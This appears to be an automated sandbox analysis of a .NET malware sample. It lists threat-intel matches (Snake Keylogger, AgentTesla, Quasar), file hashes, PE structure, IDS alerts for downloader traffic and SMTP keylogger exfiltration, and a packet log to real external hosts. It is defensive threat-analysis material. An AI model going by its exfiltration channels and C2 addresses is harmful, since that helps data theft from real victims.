            NIOBEBILISIMHIZMETLERITR  | 11_12_2023_D#U00f6nemi_MEVDUAT_Ekstre_Bilgiler.exe                  | malicious | AgentTesla, zgRAT                               | 185.87.254.58
            NIOBEBILISIMHIZMETLERITR  | phish_alert_sp2_2.0.0.0.eml                                         | malicious | HtmlDropper, HTMLPhisher                        | 77.245.154.98
            Match                             | Associated Sample Name / URL  | Detection | Threat Name                                     | Context
            54328bd36c14bd82ddaa0c04b25ed9ad  | new order 00041221.exe        | malicious | Snake Keylogger, VIP Keylogger                  | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | New Order.exe                 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | LisectAVT_2403002B_361.exe    | malicious | Quasar                                          | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | SWIFT.exe                     | malicious | Lokibot                                         | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | Payment_Advice.exe            | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | LPO-9180155-PDF.exe           | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | Apixaban - August 2024.exe    | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | Payment Slip.exe              | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | Torpernes.exe                 | malicious | GuLoader, Snake Keylogger                       | 188.114.97.3
            54328bd36c14bd82ddaa0c04b25ed9ad  | Confirmation Order.js         | malicious | Snake Keylogger                                 | 188.114.97.3
            No context
            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1216
            Entropy (8bit):5.34331486778365
            Encrypted:false
            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
            MD5:1330C80CAAC9A0FB172F202485E9B1E8
            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
            Malicious:true
            Reputation:high, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):2232
            Entropy (8bit):5.3797706053345555
            Encrypted:false
            SSDEEP:48:fWSU4xymI4RW9oUP7gZ9tK8NPZHUk7u1iMuge//8PUyus:fLHxvII5LZ2KRHzOug8s
            MD5:921295ABE821F5314EA32FAE20AA20A8
            SHA1:E9C36E2346406C33708D1BD697C5E77CC314725F
            SHA-256:1408E4F33B496A19464F2CA826B7D935149E1163783CC03D898E0413F6DF7C42
            SHA-512:C94D7E07BE1D0C08A2AD76CE4BCCA1D092B8129E4167AD74FBFD4571596AF5E580985761E549DE0BB34958F8818C052F1A74E025A1F6F4BF87E47ACA4D6EE690
            Malicious:false
            Reputation:low
            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.970686628272919
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            • Win32 Executable (generic) a (10002005/4) 49.78%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            File name:SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            File size:516'096 bytes
            MD5:967175d3aa79388fd8e84ccbf0b998c7
            SHA1:9bb041c883354d306a22ea0faf9c8deecd9f14c0
            SHA256:4607e74d7d23628239d2bdfc8d57236c09778517f758323e13fc9ca4092c07a7
            SHA512:e9d65b50fd28f0fc13c88c7d515906f32e29b6a545f0b5ad2bf0d16a83f7bc619d698cd6ae5e294f1a419d3dc5928cc86176b551578d665dda8fcb451f16003b
            SSDEEP:12288:KrHa5vF0t2/Vdh44WHdaZOyWtLLH4PgRuHTJnrwY:Ka37dd7sdaZdITRATJnrw
            TLSH:14B4230A2BC3D729DBF94BB50694844467F8B024B0B5EFAC5DE881DE0E9A7C18D721D7
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...rF.f..............0.................. ........@.. .......................@............@................................
            Icon Hash:00928e8e8686b000
            Entrypoint:0x47f5be
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x66A34672 [Fri Jul 26 06:47:14 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            (the line above repeats 97 times: the bytes following the CLR entry stub's jmp are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
            Name                                  | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT          | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_IMPORT          | 0x7f56a         | 0x4f         | .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE        | 0x80000         | 0x5ac        | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION       | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_SECURITY        | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_BASERELOC       | 0x82000         | 0xc          | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG           | 0x7dbf4         | 0x54         | .text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_TLS             | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_IAT             | 0x2000          | 0x8          | .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    | 0x0             | 0x0          |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  | 0x2008          | 0x48         | .text
            IMAGE_DIRECTORY_ENTRY_RESERVED        | 0x0             | 0x0          |
            Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
            .text  | 0x2000          | 0x7d5c4      | 0x7d600  | b234b1b01e7e5a0d783e46e95dac8a33 | False    | 0.9708511185194417 | data      | 7.977489549607041   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rsrc  | 0x80000         | 0x5ac        | 0x600    | 2c12f40f05cdc19db2479e3f25077cbc | False    | 0.4205729166666667 | data      | 4.079124777457321   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x82000         | 0xc          | 0x200    | ee72df9019bfd262c46bb70a0ca3b872 | False    | 0.044921875        | data      | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name         | RVA     | Size  | Type                                                                                   | Language | Country | ZLIB Complexity
            RT_VERSION   | 0x80090 | 0x31c | data                                                                                   |          |         | 0.43467336683417085
            RT_MANIFEST  | 0x803bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators      |          |         | 0.5489795918367347
            DLL          | Import
            mscoree.dll  | _CorExeMain
            Timestamp                        | Protocol | SID     | Signature                                                                  | Source Port | Dest Port | Source IP      | Dest IP
            2024-07-26T11:39:04.892508+0200  | TCP      | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH                          | 49706       | 80        | 192.168.2.5    | 158.101.44.242
            2024-07-26T11:39:07.660193+0200  | TCP      | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H                           | 49713       | 443       | 192.168.2.5    | 188.114.97.3
            2024-07-26T11:39:11.471883+0200  | TCP      | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H                           | 49719       | 443       | 192.168.2.5    | 188.114.97.3
            2024-07-26T11:39:45.208289+0200  | TCP      | 2044767 | ET MALWARE Snake Keylogger Exfil via SMTP                                  | 49734       | 587       | 192.168.2.5    | 77.245.159.7
            2024-07-26T11:39:06.402996+0200  | TCP      | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H                           | 49711       | 443       | 192.168.2.5    | 188.114.97.3
            2024-07-26T11:39:17.988539+0200  | TCP      | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow     | 443         | 49724     | 20.12.23.50    | 192.168.2.5
            2024-07-26T11:39:35.846618+0200  | TCP      | 2044767 | ET MALWARE Snake Keylogger Exfil via SMTP                                  | 49731       | 587       | 192.168.2.5    | 77.245.159.7
            2024-07-26T11:39:05.782404+0200  | TCP      | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH                          | 49706       | 80        | 192.168.2.5    | 158.101.44.242
            2024-07-26T11:39:38.805311+0200  | TCP      | 2044767 | ET MALWARE Snake Keylogger Exfil via SMTP                                  | 49732       | 587       | 192.168.2.5    | 77.245.159.7
            2024-07-26T11:38:56.204357+0200  | TCP      | 2044767 | ET MALWARE Snake Keylogger Exfil via SMTP                                  | 49730       | 587       | 192.168.2.5    | 77.245.159.7
            2024-07-26T11:39:08.938329+0200  | TCP      | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H                           | 49715       | 443       | 192.168.2.5    | 188.114.97.3
            2024-07-26T11:39:07.032437+0200  | TCP      | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH                          | 49712       | 80        | 192.168.2.5    | 158.101.44.242
            2024-07-26T11:39:55.942378+0200  | TCP      | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow     | 443         | 49736     | 20.12.23.50    | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 11:38:59.504123926 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:38:59.509206057 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:38:59.509282112 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:38:59.511497021 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:38:59.516836882 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:01.480242014 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:01.486656904 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:01.491547108 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:04.847099066 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:04.887263060 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:04.887305021 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:04.890470982 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:04.892508030 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:04.896044016 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:04.896064997 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.382685900 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.382807016 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.389226913 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.389234066 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.389481068 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.438653946 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.439707994 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.480514050 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.550143957 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.550228119 CEST | 443 | 49710 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.550298929 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.556344032 CEST | 49710 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.559277058 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:05.564239025 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:05.731045961 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:05.733449936 CEST | 49711 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.733546019 CEST | 443 | 49711 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.733638048 CEST | 49711 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.734004021 CEST | 49711 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:05.734035015 CEST | 443 | 49711 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:05.782403946 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:06.258131981 CEST | 443 | 49711 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:06.261246920 CEST | 49711 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:06.261274099 CEST | 443 | 49711 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:06.402828932 CEST | 443 | 49711 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:06.402888060 CEST | 443 | 49711 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:06.402965069 CEST | 49711 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:06.403424978 CEST | 49711 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:06.407903910 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:06.408332109 CEST | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:06.413151026 CEST | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:06.413233042 CEST | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:06.413347006 CEST | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:06.413584948 CEST | 80 | 49706 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:06.416022062 CEST | 49706 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:06.418185949 CEST | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:06.989404917 CEST | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:06.997026920 CEST | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:06.997078896 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:06.997895956 CEST | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:06.998126984 CEST | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:06.998143911 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:07.032437086 CEST | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:07.508771896 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:07.510747910 CEST | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:07.510831118 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:07.660165071 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:07.660228014 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:07.660295010 CEST | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:07.660988092 CEST | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:07.685070038 CEST | 49714 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:07.690812111 CEST | 80 | 49714 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:07.690897942 CEST | 49714 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:07.690953970 CEST | 49714 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:07.697208881 CEST | 80 | 49714 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:08.324615955 CEST | 80 | 49714 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:08.326114893 CEST | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:08.326148987 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:08.326350927 CEST | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:08.326608896 CEST | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:08.326621056 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:08.376194000 CEST | 49714 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:08.811335087 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:08.812900066 CEST | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:08.812941074 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:08.938364029 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:08.938572884 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:08.938725948 CEST | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:08.938939095 CEST | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:08.941608906 CEST | 49714 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:08.942508936 CEST | 49716 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:08.947098970 CEST | 80 | 49714 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:08.947160006 CEST | 49714 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:08.947259903 CEST | 80 | 49716 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:08.947310925 CEST | 49716 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:08.947376013 CEST | 49716 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:08.952137947 CEST | 80 | 49716 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:09.533092022 CEST | 80 | 49716 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:09.534358025 CEST | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:09.534389019 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:09.534473896 CEST | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:09.534775019 CEST | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:09.534785986 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:09.579385042 CEST | 49716 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:10.039746046 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:10.042064905 CEST | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:10.042098999 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:10.175286055 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:10.175393105 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:10.175445080 CEST | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:10.175807953 CEST | 49717 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:10.178982019 CEST | 49716 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:10.180231094 CEST | 49718 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:10.185339928 CEST | 80 | 49716 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:10.185355902 CEST | 80 | 49718 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:10.185606956 CEST | 49716 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:10.185619116 CEST | 49718 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:10.185650110 CEST | 49718 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:10.190747023 CEST | 80 | 49718 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:10.778944969 CEST | 80 | 49718 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:10.780145884 CEST | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:10.780237913 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:10.780325890 CEST | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:10.780567884 CEST | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:10.780602932 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:10.829504013 CEST | 49718 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:11.317209005 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:11.319113016 CEST | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:11.319188118 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:11.471843958 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:11.471946001 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:11.472151995 CEST | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:11.475883007 CEST | 49719 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:11.479039907 CEST | 49718 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:11.480336905 CEST | 49720 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:11.484880924 CEST | 80 | 49718 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:11.484963894 CEST | 49718 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:11.485174894 CEST | 80 | 49720 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:11.485250950 CEST | 49720 | 80 | 192.168.2.5 | 158.101.44.242
